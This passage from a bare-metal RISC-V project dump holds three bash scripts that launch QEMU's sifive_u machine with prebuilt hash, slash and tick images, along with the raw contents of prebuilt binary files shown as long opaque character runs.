BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCGEDEDDDOEEDEEDDGEEEECEDGEEDEDLAKJDDDBDDEDDNCMCDDDDDGMCLCFFDCOBGEDDEGDCHCDDDALCDLMFHGDCHCDDDACOKEDAPFLDLDDDDDDDDLPABHBHBKBHFDFCCKBFCHBbPEFNDDDDDBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB3Z0A3QCAyayayayayayayayayayayayayayayayayayayayaEcY3e##0axAj#1Ay75v71J3SEAi##2ax7Eo91J3SEAY##3ax75#zMJ3SEAM#y#y##4axQcY3E##5ax7ER81J3SEAY##6ax7Ej81J3SEAY##7ax75PP9J3ZEA#8Ay7#z81I3Z#A#9AyAa75r05J3ZEA#2Ay7EBA9J3ZEA#3Ay7#F#1Im93S#Au3#4ax7Ea85J3SEAY3#5ax7Up01J3ZEA#6Ay759M5J3SEAi##7axAcy3e3#8axEcY3e##9axAaAj#2Ay7#h91I3Z#A#3AyySySySySs0A4


--------------------------------------------------------------------------------
/baremetal/prebuilt/launch_hash:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | CMD="qemu-system-riscv64 -nographic -machine sifive_u -device loader,file=hash.bin,addr=0x80000000"
3 | #CMD="qemu-system-riscv64 -gdb tcp::1235 -machine sifive_u -device loader,file=hash.bin,addr=0x80000000 -S"
4 | echo "$CMD"
5 | ${CMD}
6 | 


--------------------------------------------------------------------------------
/baremetal/prebuilt/launch_slash:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | CMD="qemu-system-riscv64 -nographic -machine sifive_u -device loader,file=slash.bin,addr=0x80000000"
3 | #CMD="qemu-system-riscv64 -gdb tcp::1235 -machine sifive_u -device loader,file=slash.bin,addr=0x80000000 -S"
4 | echo "$CMD"
5 | ${CMD}
6 | 


--------------------------------------------------------------------------------
/baremetal/prebuilt/launch_tick:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | CMD="qemu-system-riscv64 -nographic -machine sifive_u -device loader,file=tick.bin,addr=0x80000000"
3 | #CMD="qemu-system-riscv64 -gdb tcp::1235 -machine sifive_u -device loader,file=tick.bin,addr=0x80000000 -S"
4 | echo "$CMD"
5 | ${CMD}
6 | 


--------------------------------------------------------------------------------
/baremetal/prebuilt/slash.bin:
--------------------------------------------------------------------------------
1 | ySySo/0/BBBBB03JBBBBBBBBBBBBBPCJBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB